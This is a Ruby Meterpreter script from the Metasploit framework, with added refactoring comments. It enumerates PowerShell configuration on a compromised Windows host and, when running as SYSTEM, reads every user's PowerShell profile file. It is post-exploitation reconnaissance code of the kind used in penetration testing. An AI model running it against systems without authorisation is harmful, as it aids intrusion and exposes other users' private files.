  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #Meterpreter script for enumerating Microsoft Powershell settings.
  7. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
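@client = client

# Argument parsing: the only recognised switch is "-h" (help).  A plain local
# is enough here; the old @@class variable leaked a class-level name for no
# benefit, and the help text named a different script ("enum_scripting_env")
# and claimed WSH enumeration that this script does not perform.
exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)
exec_opts.parse(args) do |opt, _idx, _val|
  case opt
  when "-h"
    print_line("enum_powershell_env -- Enumerates PowerShell Configurations")
    print_line("USAGE: run enum_powershell_env")
    print_line(exec_opts.usage)
    raise Rex::Script::Completed
  end
end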
  21. #Support Functions
  22. #-------------------------------------------------------------------------------
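# Build the list of user profiles whose PowerShell profile directory should be
# inspected.
#
# When running as SYSTEM the list is read from the profiles directory on the
# system drive; otherwise only the current user (USERNAME) is returned, since
# other profiles would not be readable anyway.
#
# @return [Array<Hash>] one Hash per user with String keys:
#   'username'    => account / profile folder name
#   'userappdata' => that user's WindowsPowerShell profile directory
#                    (trailing backslash included)
def enum_users
  os = @client.sys.config.sysinfo['OS']
  sysdrv = @client.sys.config.getenv('SystemDrive')

  # Only the pre-Vista layout keeps profiles under "Documents and Settings";
  # Vista/2008 and every later release use "\Users".  The previous check
  # matched a fixed list of newer versions (7/Vista/2008) and silently fell
  # back to the legacy layout for anything it did not name (8, 10, 2012, ...).
  if os =~ /Windows (2000|XP|2003|\.NET Server)/
    path4users = sysdrv + "\\Documents and Settings\\"
    profilepath = "\\My Documents\\WindowsPowerShell\\"
  else
    path4users = sysdrv + "\\Users\\"
    profilepath = "\\Documents\\WindowsPowerShell\\"
  end

  unless is_system?
    uservar = @client.sys.config.getenv('USERNAME')
    return [{ 'username' => uservar, 'userappdata' => path4users + uservar + profilepath }]
  end

  print_status("Running as SYSTEM extracting user list..")
  users = []
  @client.fs.dir.foreach(path4users) do |u|
    # Skip "." / ".." and the well-known non-user profile folders; anchored
    # with \A/\z so the whole entry name must match.
    next if u =~ /\A(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)\z/
    users << { 'username' => u, 'userappdata' => path4users + u + profilepath }
  end
  users
end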
  54. #-------------------------------------------------------------------------------
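# Report the PowerShell installation recorded in the registry: engine version,
# execution policy, install path, registered snap-ins, module directories on
# PSModulePath and the contents of each user's Microsoft.PowerShell_profile.ps1.
#
# Everything is reported through print_status/print_error; nothing is returned.
def enum_powershell
  # registry_enumkeys may return nil when the key is absent; Array() keeps the
  # include? check from raising NoMethodError.
  unless Array(registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\")).include?("PowerShell")
    print_status("PowerShell does not appear to be installed on this system.")
    return
  end

  print_status("Powershell is Installed on this system.")
  ps_root = "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1"
  shell_ids = "#{ps_root}\\ShellIds\\Microsoft.PowerShell"

  powershell_version = registry_getvaldata("#{ps_root}\\PowerShellEngine", "PowerShellVersion")
  print_status("Version: #{powershell_version}")

  # A missing ExecutionPolicy value (or a failed read) means the default,
  # which is Restricted.
  powershell_policy =
    begin
      registry_getvaldata(shell_ids, "ExecutionPolicy")
    rescue StandardError
      nil
    end
  print_status("Execution Policy: #{powershell_policy || 'Restricted'}")
  print_status("Path: #{registry_getvaldata(shell_ids, "Path")}")

  enum_powershell_snapins(ps_root)
  enum_powershell_modules(powershell_version)
  enum_powershell_profiles
end

# Print every registered PowerShell snap-in under +ps_root+ together with its
# registry values.
#
# @param ps_root [String] the HKLM PowerShell\1 key
def enum_powershell_snapins(ps_root)
  unless Array(registry_enumkeys(ps_root)).include?("PowerShellSnapIns")
    print_status("No PowerShell Snap-Ins are installed")
    return
  end

  print_status("Powershell Snap-Ins:")
  snapins_key = "#{ps_root}\\PowerShellSnapIns"
  Array(registry_enumkeys(snapins_key)).each do |si|
    print_status("\tSnap-In: #{si}")
    Array(registry_enumvals("#{snapins_key}\\#{si}")).each do |v|
      value = registry_getvaldata("#{snapins_key}\\#{si}", v)
      print_status("\t\t#{v}: #{value}")
    end
  end
end

# List the module directories found on PSModulePath.  Modules exist only from
# PowerShell 2.0 onwards, so older engines are skipped.  The previous test
# (`=~ /2./`) was an unanchored regex with an unescaped dot, and it treated the
# whole PSModulePath string as one directory.
#
# @param powershell_version [String, nil] value of PowerShellVersion
def enum_powershell_modules(powershell_version)
  major = powershell_version.to_s.split('.').first.to_i
  return if major < 2

  print_status("Powershell Modules:")
  # PSModulePath is a ';'-separated list of directories on Windows.
  @client.sys.config.getenv('PSModulePath').to_s.split(';').each do |dir|
    next if dir.empty?
    begin
      @client.fs.dir.foreach(dir) do |m|
        next if m =~ /\A(\.|\.\.)\z/
        print_status("\t#{m}")
      end
    rescue StandardError => e
      # One unreadable entry should not abort the rest of the listing.
      print_error("\tCould not list #{dir}: #{e.message}")
    end
  end
end

# Print the contents of each user's Microsoft.PowerShell_profile.ps1, if one
# exists.  Contents are handled per user; the previous implementation shared
# one buffer across all users, so only the first non-empty profile found was
# ever printed.
def enum_powershell_profiles
  print_status("Checking if users have Powershell profiles")
  enum_users.each do |u|
    print_status("Checking #{u['username']}")
    begin
      @client.fs.dir.foreach(u['userappdata']) do |p|
        # Windows file names are case-insensitive; compare the whole name
        # rather than an unescaped regex fragment.
        next unless p.downcase == 'microsoft.powershell_profile.ps1'
        contents = read_profile_file(u['userappdata'] + p)
        next if contents.strip.empty?
        print_status("Profile for #{u['username']} not empty, it contains:")
        contents.each_line { |l| print_status("\t#{l.strip}") }
      end
    rescue StandardError => e
      # A missing WindowsPowerShell directory is the normal case for a user
      # who never ran PowerShell; report it rather than abort the script.
      print_status("\tNo readable profile directory for #{u['username']} (#{e.message})")
    end
  end
end

# Read a remote file completely and return its contents as a String, closing
# the handle even if a read fails part-way.
#
# @param path [String] remote path of the file to read
# @return [String] file contents
def read_profile_file(path)
  fd = @client.fs.file.new(path, "rb")
  begin
    data = ""
    data << fd.read.to_s until fd.eof?
    data
  ensure
    fd.close
  end
end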
  115. if client.platform == 'windows'
  116. enum_powershell
  117. else
  118. print_error("This version of Meterpreter is not supported with this Script!")
  119. raise Rex::Script::Completed
  120. end